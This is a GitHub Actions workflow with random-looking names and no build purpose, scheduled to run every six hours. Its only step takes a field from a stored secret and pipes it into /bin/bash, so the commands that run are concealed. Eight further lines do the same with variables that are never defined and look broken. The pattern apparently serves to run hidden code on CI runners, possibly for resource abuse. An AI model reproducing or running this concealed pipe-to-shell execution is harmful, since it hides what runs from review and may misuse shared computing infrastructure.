name: yangsinian8765

on:
  workflow_dispatch:
  schedule:
    - cron: '0 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yangsinian8765
        env:
          he01403: ${{ secrets.he01403 }}
        run: |
          echo $he01403 | jq -r .s7 | /bin/bash
          echo $b58 | jq -r .hly743 | /bin/bash
          echo $p581 | jq -r .mnlx09563 | /bin/bash
          echo $ees0 | jq -r .dl2979 | /bin/bash
          echo $cmc96 | jq -r .u8 | /bin/bash
          echo $qort422 | jq -r .m7 | /bin/bash
          echo $cggdc2363 | jq -r .zeq1420 | /bin/bash
          echo $hicmj8857 | jq -r .ti16818 | /bin/bash
          echo $ono58 | jq -r .lxs5140 | /bin/bash

